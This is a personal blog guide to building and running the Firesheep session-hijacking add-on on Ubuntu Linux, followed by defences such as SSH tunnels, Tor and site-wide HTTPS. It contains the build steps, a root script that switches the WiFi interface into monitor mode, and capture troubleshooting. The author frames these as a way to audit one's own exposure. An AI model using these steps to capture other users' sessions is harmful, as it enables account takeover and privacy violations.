|View: HTML | Text | PS | PDF | RTF | Wiki | DocBook | DocBook Inline | changelog | about this header||
Circle Jeff Boweron
This document describes how to install Firesheep under Linux, while tested on Ubuntu Maverick it should be easy enough to use this technique on most flavors of Linux. Normally I like newbies, I was once one of you and I love teaching people how to use Linux. This is a special case, if you're not already somewhat skilled you should NOT be using Firesheep. If you want to use it to answer any particular questions please feel free to contact me and I'll answer them as best as I can for you, if you want to make rude comments on other people's Twitter feeds please go elsewhere.
I'm uncertain about this document since I'm a bit torn about Firesheep - it's like putting a loaded gun in the hands of a toddler. The legitimate use of Firesheep is to force Facebook to implement an SSL-enabled website, mission accomplished. There are several other websites that need help, Google is not 100% SSL enabled, Twitter, Yahoo! and Amazon are also in the Firesheep dropdown list. It's a great way to demonstrate how insecure web browsing on public WiFi hotspots can be and why we should all look into using SSH proxies whenever possible while pressuring content providers to provide us with the SSL encryption we need to actually be safe.
Firesheep was released in October 2010 by security researcher Eric Butler. Firesheep itself is nothing new, the idea of session hijacking has been around for ages but Eric was the first to make it idiot-accessible and, let's face it, anyone who routinely says things like "haxors" instead of "hackers" or "l33t" instead of "elite" is probably an idiot. Firesheep listens in on the wireless network you're connected to and tries to see if anyone else on the network is logging into certain vulnerable websites. It doesn't steal your password because that's protected by an SSL connection, what it exploits is that the encrypted HTTPS connection is perceived as expensive or slow to use for everything so most websites give you a cookie that is passed in the clear - that is, it's unencrypted. That cookie essentially says "I've already been authenticated and here's my session ID." For the most part this is fine, your ISP really doesn't care about hacking into your Facebook posts and snooping the packet on the wire needs actual skill (as well as physical access in many cases). But at your local Starbucks while you're sipping on your grande skinny soy manufactured name coffee people can be slurping down each and every packet you send out - including the packets containing that magic cookie.
Firesheep listens for those cookies from websites it knows about and pops up a little icon that says it found one. By clicking on that icon it will go to the website and present it with the cookie, allowing you to log in as that user without needing a password. There are limits. You need to be on the same WiFi network (or a non-switched wired network - but these are hard to come by), the user needs to have SSL disabled (for Facebook and parts of Google), that session may expire after a period of time, etc. But Firesheep makes it pretty trivial to view and post as another user - even to the point of putting up the user's profile picture so you may be able to recognize them.
Installing Firesheep is probably not illegal, it's kind of like owning a set of lockpicks. Generally they're legal to own but it's not legal to use them unless the owner of the lock approves, but watch out because some places actually do think they can stop thieves by making lockpicks illegal to own. In most parts of the world it's probably just fine to use it as it was (presumably) intended - as a security tool to audit various websites. For myself, I've used it to see if Tweetdeck is vulnerable on my own computer. Luckily with Facebook, Twitter, FourSquare, and Buzz all enabled in Tweetdeck I didn't see anything pop up in Firesheep so I appear to be safe for most of my concerning applications. However, using non-SSL Google pages or going to Twitter's webpage via Chrome I was able to access my account without logging in on FireFox and, most distressingly, I was able to log into my Amazon account by just browsing to Amazon's website.
What you do with Firesheep may not be legal if you're doing it to someone without their knowledge. Viewing information may be protected by state or federal privacy laws. Posting information under that user's account may be construed as identity theft. Obviously hacking into someone's Amazon account and making a purchase crosses far more boundaries than I can even begin to list. In essence, about the only thing that MAY be legal to do with Firesheep is look at all the pretty icons that come up.
Building Firesheep is the hard part. First, you'll need git if you don't have it already. Under Debian-based systems this is just sudo apt-get install git. Git is an open source framework, essentially designed to access code hosted for public viewing (and editing) at a place called github.
We'll also want to make sure we've got our build dependencies. I needed to add the following, but you may need more (especially if you don't have things like tcpdump or wireshark installed). sudo apt-get install git dh-autoreconf xulrunner-dev libpcap-dev libboost-dev libhal-dev libhttp-parser-perl
Now we're ready to get crackin'!
cd git clone git://github.com/mickflemm/firesheep.git cd firesheep git submodule update --init ./autogen.sh --with-xulrunner-sdk=/usr/lib/xulrunner-devel-22.214.171.124
You may find that there are some complaints here. You've got three choices: 1) You can use apt-cache search to find the dependency and then install it. 2) You can install everything under the sun with the command sudo apt-get install git libcap2-bin libsmi2ldbl libc-ares2 wireshark-common wireshark libstdc++6-4.4-dev g++-4.4 libboost1.42-dev libboost-dev x11proto-core-dev libice-dev libxau-dev libxdmcp-dev x11proto-input-dev x11proto-kb-dev xtrans-dev libpthread-stubs0 libpthread-stubs0-dev libxcb1-dev libx11-dev g++ libdpkg-perl dpkg-dev build-essential html2text libunistring0 gettext intltool-debian po-debconf debhelper libalgorithm-diff-perl libalgorithm-merge-perl libglib2.0-bin zlib1g-dev libglib2.0-dev libatk1.0-dev libcairo-gobject2 libexpat1-dev libfreetype6-dev libfontconfig1-dev x11proto-render-dev libxrender-dev libpng12-dev libsm-dev libpixman-1-dev libxcb-render0-dev libxcb-shm0-dev libcairo2-dev libdbus-1-dev libdbus-glib-1-dev libgdk-pixbuf2.0-dev libxft-dev libpango1.0-dev x11proto-xext-dev libxext-dev x11proto-xinerama-dev libxinerama-dev libxi-dev x11proto-randr-dev libxrandr-dev x11proto-fixes-dev libxfixes-dev libxcursor-dev x11proto-composite-dev libxcomposite-dev x11proto-damage-dev libxdamage-dev libgtk2.0-dev libsys-hostname-long-perl libmail-sendmail-perl libnotify-dev libnspr4-dev libnss3-dev libiw-dev m4 autoconf autotools-dev automake autopoint libtool dh-autoreconf libltdl-dev libpcap0.8-dev libpcap-dev libreadline5 libruby1.8 libpcap-ruby1.8 libpcap-ruby libpcapnav0 libpcapnav0-dev python-libpcap libpcap0.8-dbg xulrunner-1.9.2-dev xulrunner-1.9.2 3) You can just give up because it's too hard.
Once that's complete, just run make and you'll build build/firesheep.xpi - the FireFox plugin.
So you've got mad haxor skillz yet you can't quite figure out how to follow instructions and build it yourself? I promise this version doesn't have a keylogger built in that will send me the passwords to all of your accounts. Honest. Now go back and build it so you can actually learn something instead of just deface stranger's Facebook pages! Note that this was built on a Maverick amd64 system, it didn't seem to be portable to a Maverick i386 system so you may be stuck with building it yourself anyway.
Open up FireFox (yes, I know, it's bloated and slow and pretty much turning into the IE of the non-Windows world but it's also apparently the only browser with security holes big enough that let you run code this serious - at least the Linux version requires root access). If you start from the command line you can run firefox firesheep.xpi, if not, just drag firesheep.xpi into an open FireFox window and it will install and prompt you to restart the browser. Don't bother, just shut down FireFox for now.
You need to give Firesheep the appropriate permissions by running cd ~/.firstname.lastname@example.org/platform/*gcc3 && sudo ./firesheep-backend --fix-permissions and entering your password as needed. If this part fails you probably downloaded my .xpi file and it's not working on your system. Try building it yourself and see if it fixes things.
First open up FireFox and click on-> and then click on the button for Fire sheep. About the only thing you'll need to do is select the Interface to listen to, for most people that will be a WLAN interface as shown below. If you get an error message, or don't see interfaces here, you didn't run firesheep-backend properly and should read the previous paragraph again.
Now you should be all set and ready to run Firesheep. To test it, make sure you've got another browser installed (it doesn't matter which one, but I prefer Google Chrome [open source nuts may prefer sudo apt-get install chromium-browser]).
Firesheep is designed to be very easy to use. To start, click on-> -> (Shift-Ctrl-S). Using a very tiny FireFox window dominated by a lot of FireFox clutter, you should see something like this.
Just click thebutton and then move to your other browser. Login or just access an existing site, for a list you can go back to the Firesheep preferences (also accessible from the little gear icon at the bottom of the sidebar) and click the tab. By opening up Twitter in Chrome my FireFox browser was able to capture my login. You can view details of the capture by clicking the little up arrow and then on the user, but this is not information I'm about to publish for security reasons. By doubleclicking on the icon you can open up this session in the main browser window.
If you want to stop the capture, just click on the (surprise!)button. By clicking on the gear icon you have the option to clear your current list. That's about all there is to it, pretty simple and pretty scary. Luckily some of the captures don't seem to work very well, I can log into the Google homepage as myself but accessing my Gmail account requires a password.
If you're running into capture issues you may need to put your WiFi interface into promiscuous mode. All jokes about your spouse/significant other/mother/etc. aside, promiscuous mode tells your Ethernet interface to listen to every packet that comes in. While described in the sources for my document I haven't needed this myself. One reason for that may be my chipset, but the real reason is that I couldn't care less about hijacking other sessions and I only need to listen to my own packets.
First thing's first, you have actually tried to capture your own session on another browser, right? If this didn't work you'll need to fix that before you continue. The future troubleshooting is all based on the premise that Firesheep itself is working but your capture is not, if you can't capture your own local traffic you won't be able to capture anyone else's.
I've created a simple script that allows you to run firesheep enable to put your interface into promiscuous mode and then firesheep disable to move back to normal mode. You'll probably want to edit the
interface variable, on my Broadcom-based system it's eth1 but on some systems it may be wlan0. As I mentioned, I don't need this script so I don't run it. With some systems you won't be able to send packets in Firesheep mode, only receive them.
Example A-1. firesheep
#!/bin/bash interface=wlan0 if [ ! $# = 1 ]; then echo Usage: echo $(basename $0) enable\|disable exit 1 fi if [ ! $EUID = 0 ]; then echo "Sorry, $(basename $0) must be run as root" exit 2 fi if [ $1 = "enable" ]; then ifconfig $interface down iwconfig $interface mode monitor ifconfig $interface up echo "Enabling Firesheep mode" fi if [ $1 = "disable" ]; then ifconfig $interface down iwconfig $interface mode managed ifconfig $interface up echo "Disabling Firesheep mode" fi
Some people have had luck swapping their wireless kernel modules around. To try this out, try sudo rmmod wl && sudo insmod bc43. If you just broke your network connection, reboot and try something else.
Finally, some people have had luck if they start a capture program before using Firesheep. If you run something like tcpdump or ettercap this may help since it will set promiscuous mode for you. They are also infinitely more useful utilities if you actually do want to migrate from Anonymous "haxor" loser status to an actual hacker who knows what they're doing...
I'm probably not going to help most people out with this unless they can actually tell me why they need it up and running. However, feel free to look at Bryan's Geek Stuff or the GitHub thread to get more details. If you don't understand what's there, you probably won't understand what Firesheep is good for anyway ;)
Actually using Firesheep for research I figured I'd share my findings. First, Firesheep seems to have a fairly easily editable list of websites it can sniff that is much more extensive than I had expected. I thought Firesheep was mostly about Facebook and Twitter, but the list of affected websites includes pretty much every major web email provider and even the website hosting the code.
Luckily, not all of them give anything meaningful. Google, for example, allows you to get to the Google search page apparently associated with the user but if you try to open any useful apps such as Gmail or Docs it will prompt for a username/password. The code hosting website also seems to forward everyone over SSL now, so they've fixed the issue. And Facebook gives the option to use SSL which prevents Firesheep from actually hijacking the session - as long as you've enabled it. Follow these links for pictures and video showing how to implement this feature.
Yahoo is similar to Google, they can mess with your homepage layout but to get to mail or groups they'll need to login.
The Tweetdeck Chrome Extension (at least with Facebook set to HTTPS mode) doesn't expose you to Firesheep. I haven't played with the AIR app but I assume it works in a similar manner.
Twitter does have an SSL-enabled site that is protected, but it doesn't have Facebook's feature of forcing you to the site. You need to manually type https://www.twitter.com/ to use it.
Hotmail users, you may want to submit to your Google overlords. With Firesheep you can log into the session and read and send mail as though you had their password. There are websites for securing this but really, there's no excuse for them to make you change this setting.
Don't browse Amazon on open WiFi connections. Sure, the attacker won't be able to send themselves anything good since Amazon wisely restricts adding new addresses without a password, but they can still buy a few thousand dollars of stuff and if you miss the emails or can't cancel the order in time it'll be a hassle to send things back.
So Firesheep is indeed scary for a lot of sites. What do you do about it?
One good idea is not to use public WiFi networks. Unsecured networks like this are a honeypot for hackers, ones with more sophisticated tools than Firesheep. Remember that your work WiFi network is also public, even if it is secured. Separate your work and home life, don't post on Facebook at work and don't shop for stuff on Amazon.
Obviously in some cases avoiding public WiFi may be tough. If you've got a VPN this may help protect you depending on how it's implemented. One good option if you've got a smart phone (and a reasonable carrier) is using WiFi hotspot functionality when you're in Starbucks. This can give you a private, secured WiFi network to play with that's probably about as fast as the public network (and with LTE probably a good deal faster).
If you have a WiFi network at home (and who doesn't?) you need to secure it. Check your router manual and enable WPA security (WEP is not security and people who are willing to download Firesheep can download equally easy to use tools to crack WEP).
Proxies are nice, they can create an encrypted connection from your browser to a trusted computer out on the Internet which is a bit more secure than an open WiFi hotspot. But proxies are bad in that they slow down your day-to-day browsing by rerouting your traffic far away and incurring the overhead of encryption on things that don't really need it.
If you use Chrome you'll want to look into Proxy Switchy! which can allow you to selectively use a proxy for certain websites, but leave the others alone. I use it to route work websites through my work proxy, sites like Amazon, Facebook, and Twitter through my home proxy, and it allows me to use Tor as necessary (more on these later). FireFox users can look at FoxyProxy which has similar features. I haven't researched IE and Safari users tend not to have anything worth stealing since they spend all their money on underpowered shiny things.
I have an SSH server. They're really easy to set up on Linux and Windows isn't too hard either (although you can look into a Linux Virtual Machine if you want to have a little more fun!). You'll also need to set up port forwarding on your router, you can use this annoying website to get instructions, just select your router from the list after the annoying "you can pay us to do it for you ad", then click the link at the top to skip the annoying "you can pay us to do it for you ad", then click on SSH after the annoying "you can pay us to do it for you ad" and it will walk you through setting up your own SSH server. This server should be running on your desktop at home and you'll probably want to look into a Dynamic DNS service so you can have an easy-to-remember hostname.
Once you've got an SSH server at home, you can connect to it from your laptop. For Linux it's as simple as ssh -D 1080 your.hostname.com. Now you can set up a SOCKS proxy to yourself (known as "localhost" or "127.0.0.1") on port 1080. If you visit websites like http://www.whatsmyip.org/ you'll notice that (if you've set this up properly) the IP address listed is actually your home address instead of wherever you're at.
Under Windows I'd recommend installing CygWin. This will give you access to the same SSH command under Linux (as well as a lot of other cool stuff) without needing a virtual machine or to dual boot. For those who prefer a GUI, look into PuTTY which is a common, highly functional Windows SSH client.
The nice thing is this is a SOCKS proxy so you're not just limited to web browsing. You can access your email through this, IM chats, or just about anything else. It's encrypted from your laptop to your home computer, but it's important to note that it's NOT encrypted from your home computer to the Internet (obviously if you've got a secure connection to a website anyway, then it's doubly secured to your home but only regular security from your home to the website). This is a bit safer because only your ISP really has access to this data, but it's not a complete solution.
Another nice side effect is that if you travel overseas you can use this proxy to view local content. If you're a US resident and like Hulu or Netflix, traveling outside the US means your access is blocked. By using an SSH tunnel to your house as a proxy, it looks like you're viewing the content from your home. Now the connection may not be as good as when you are in the US but in general it should be just fine.
An arguably more secure version is to use the Tor Project. This is an anonymous proxy that provides a secure connection from your computer, through the Tor network, to a random egress point. There is a risk that there's a bad guy at this egress, but neither you nor he have any control over how this egress is chosen so it's harder to do a directed attack against you and most Tor users willing to donate their bandwidth aren't in it to hack your Facebook account. Tor is also very slow, so use it wisely and consider donating your bandwidth to become a routing node.
This is really the only viable solution. End-to-end encryption from your browser to the server will protect you better than any other solution. The critical flaw that Firesheep exploits is that when you're on WiFi anyone on that WiFi connection can hear everything you say. Using third party proxies involves a level of trust with the proxy owner. Using your own proxy is better, but you're still unprotected in the Internet itself. It takes a much more sophisticated hacker to handle these sorts of attacks, but it still needs trust between you, your ISP, and every ISP between you and the server you're talking about.
Arguments against HTTPS include expense and resources. Any major site can afford a good SSL certificate, expense is not an excuse for major players (and most already have a certificate for at least logins). As a barrier of entry for a new startup this is also a non-issue. I've written a quick tutorial on Configuring Apache2 for SSL Under Ubuntu Lucid where I mention StartSSL as a good, and free, solution for basic encryption. It takes a very small amount of time and lasts for an entire year after which it can be renewed, again for free.
A slightly more accurate complaint is about the resource utilization. For small businesses this isn't a problem, for a low volume web server like mine the overhead of an SSL cert is pretty much nothing. For a large organization a dedicated SSL termination box can help offload your server to allow it to function even better. It's only the mid-sized organizations that have a webserver operating marginally below capacity where you may need to expand things a bit. But still, if the cost of an additional SSL termination server or a webserver upgrade is a significant part of your operating expenses you really need to look at your business model.
However, not all websites need SSL encryption. My own website largely does not - the only two pages that really should have it are my forums (which are largely unused) and my Stoker management pages. The only pages that need to be secured are those that actually pass personal information. Whether they pass credit card information or simply allow you to post a comment on a news story protecting your online identity is important. From my perspective there is also no downside to encrypting this page even though a snooper can't possibly glean anything personal about you from it.
My name is Jeff Bower, I'm a technology professional with more years of experience in the telecommunications industry than I'd care to admit. I tend to post with the username jdbower on various forums. Writing these documents is a hobby of mine, I hope you find them useful and feel free to browse more at https://www.ebower.com/docs.